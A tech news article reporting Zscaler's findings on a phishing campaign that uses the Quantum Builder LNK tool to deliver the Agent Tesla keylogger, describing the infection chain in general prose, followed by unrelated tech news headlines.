A new malware campaign uses the recently discovered Quantum Builder and sophisticated tactics to deliver malicious payload.

zscaler, cyber security
Credit: Dreamstime

A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cyber security vendor Zscaler.

Quantum Builder, also known as Quantum LNK Builder, is used to create malicious shortcut files. It has been linked to Lazarus — an APT (advanced persistent threat) actor linked to North Korea — due to shared tactics, techniques, procedures (TTPs) and source code overlap. “But we cannot confidently attribute this campaign to any specific threat actor,” Zscaler noted in a blog post.

Agent Tesla was first detected in 2014. In the current campaign, Quantum Builder is being used to generate malicious .lnk, .hta, and PowerShell payloads, which then deliver Agent Tesla to the targeted machines, according to Zscaler.

“This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past,” Zscaler noted.

Quantum Builder used in a string of new malware attacks

Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. “This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organisations,” Zscaler noted.

The payloads generated by the builder employ sophisticated techniques such as user account control bypass using the Microsoft Connection Manager Profile Installer (CMSTP) binary to execute the final payload with administrative privileges, and to perform Windows defender exclusions.

The new malware campaign has also been seen utilising a multi-staged infection chain integrating various attack vectors, Zscaler said. It executes PowerShell scripts in-memory to evade detection and is also seen executing decoys to distract victims after devices have been infected.

New attacks start with spear phishing email

The attack chain starts with a spear-phishing mail that that contains a GZIP attachment. The GZIP includes a shortcut that is designed to execute PowerShell code that is responsible for launching a remote HTML application using mshta.exe binaries.

The phishing email looks like it is from a Chinese supplier of lump and rock sugar—it has a subject line stating “New Order Confirmation – Guangdong Nanz Technology co. ltd.”—and  has a malicious .lnk file with a PDF icon.

Once the document is opened, the HTA file decrypts a PowerShell loader script which decrypts and loads another PowerShell script after performing advanced encryption standard decryption and GZIP decompression. 

The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a remote server, and then executes it with administrative privileges by performing a user account control bypass (UAC) using the CMSTP. Agent Tesla is then executed on the target machine with administrative privileges.

There was also a second variant of Agent Tesla observed, where the threat actors used a ZIP file and other sophisticated methods to hide their activities. Agent Tesla has been active since 2014, in 2018 it had more than 6,300 customers who pay subscription fees to license the software. Currently, Agent Tesla is being sold for $182 a month on the dark web, according to Hacker News.

Quantum builder was first discovered by Cyble Research Labs in June this year on a cybercrime forum. The threat actor claimed in the post that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. There was also a video posted demonstrating how to build .lnk, .hta, and .iso files using the malware builder.

The .hta payload can be created using Quantum Builder by customising options such as payload url, DLL (dynamic link library), UAC Bypass, and execution path detaails as well as a time delay to execute the payload.

TECH NEWS RELATED

Scoop: HUL, other FMCG majors in sale talks with nutrition firm Oziva

ETtechHindustan Unilever (HUL) has held talks to acquire plant-based supplement brand Oziva, multiple people in the know said, signalling the start of what could trigger a wave of consolidation in the direct-to-consumer (D2C) brand market.Oziva, which sells nutrition and fitness products across categories such as women’s health, skin, hair, men’s ...

View more: Scoop: HUL, other FMCG majors in sale talks with nutrition firm Oziva

Exclusive: Swiggy may fire 250 employees in December, more layoffs possible in coming months

ETtechFood and grocery delivery company Swiggy is laying off up to 250 employees this month, which is about 3-5% of its workforce, five people aware of the development told ET.Two of the sources said the layoffs could go beyond 250 in coming months while another said people across supply chain, ...

View more: Exclusive: Swiggy may fire 250 employees in December, more layoffs possible in coming months

Social platforms flag age-gating fears in MeitY’s IT rules meet

ETtechSome social media and internet platforms have expressed concerns to the ministry of electronics and IT on certain provisions of the draft Digital Personal Data Protection (DPDP) Bill which includes age-gating, sources said. The Bill has defined a child as a person who is below the age of 18 and ...

View more: Social platforms flag age-gating fears in MeitY’s IT rules meet

Spice Money to offer B2B transactions on ONDC next quarter

ETtechSpice Money (a bootstrapped subsidiary of DiGiSPICE Technologies), one of the five buyer applications on the government-backed e-commerce platform the Open Network for Digital Commerce (ONDC) is going to foray into B2B business on the network next quarter with the electronics category.So far, the transactions on the network have been ...

View more: Spice Money to offer B2B transactions on ONDC next quarter

iPhone 14’s Emergency SOS via satellite feature may launch in the UK next week

Apple has promised that its Emergency SOS via satellite feature, an exclusive safety feature for the iPhone 14 and iPhone 14 Pro, would launch in four more countries by the end of the year. It seems we may have a launch date for one of those countries. As reported ...

View more: iPhone 14’s Emergency SOS via satellite feature may launch in the UK next week

Tecno MegaBook S1 brings 15.6″ 120Hz display and 12th Gen Core i7

Today was a big day for Tecno as the company presented its very first flagship phones – Tecno Phantom X2 and Phantom X2 Pro. These devices come with compelling specs such as Dimensity 9000, 120 Hz OLED displays, and capable cameras. The Pro has the first retractable portrait camera on ...

View more: Tecno MegaBook S1 brings 15.6″ 120Hz display and 12th Gen Core i7

Everything You Need to Know About the Lucid Air Pure — Lucid’s Affordable Take On Its Electric Luxury Sedan

Lucid is making waves in the electric luxury car segment. Car and Driver says it’s “swift, stylish, and state-of-the-art” and calls the Lucid Air a “formidable electric luxury sedan.” What’s more, the company recently announced some significant changes for 2023. Among those changes are improved performance and a lower base ...

View more: Everything You Need to Know About the Lucid Air Pure — Lucid’s Affordable Take On Its Electric Luxury Sedan

Mars is hiding exciting mysteries beneath its surface 

A group of scientists from the University of Arizona has challenged the current views on the evolution of Martian geodynamics. A new report from the researchers suggests that Mars’ interior is far more active than previously believed, and that a giant mantle plume is currently lifting the surface upward, causing ...

View more: Mars is hiding exciting mysteries beneath its surface 

Dyson's noise-cancelling, air-purifying headphones are finally coming to Singapore

SpaceX announces Starshield, a new satellite service for governments

Microsoft Teams launches Communities feature to take on Discord

US state of Indiana sues TikTok, alleging Chinese access to user data

Redmi K60 with SD8 Gen 2, Pro with SD8+ Gen 1, seriously?

Lucid Air awarded 5-star Euro NCAP safety rating

New bot ChatGPT will force colleges to get creative to prevent cheating, experts say

OpenAI’s latest chatbot is sending Chinese users into a frenzy even though it is officially unavailable in the country

Oppo Find N2 and N2 Flip to come on December 15

SpaceX files FCC request to put payloads on satellites for direct-to-cell system with T-Mobile

Argentine ants will do anything for sugar, but they won't do this

Ixion Wants You To Command An Arc To The Stars

OTHER TECH NEWS

Top Car News Car News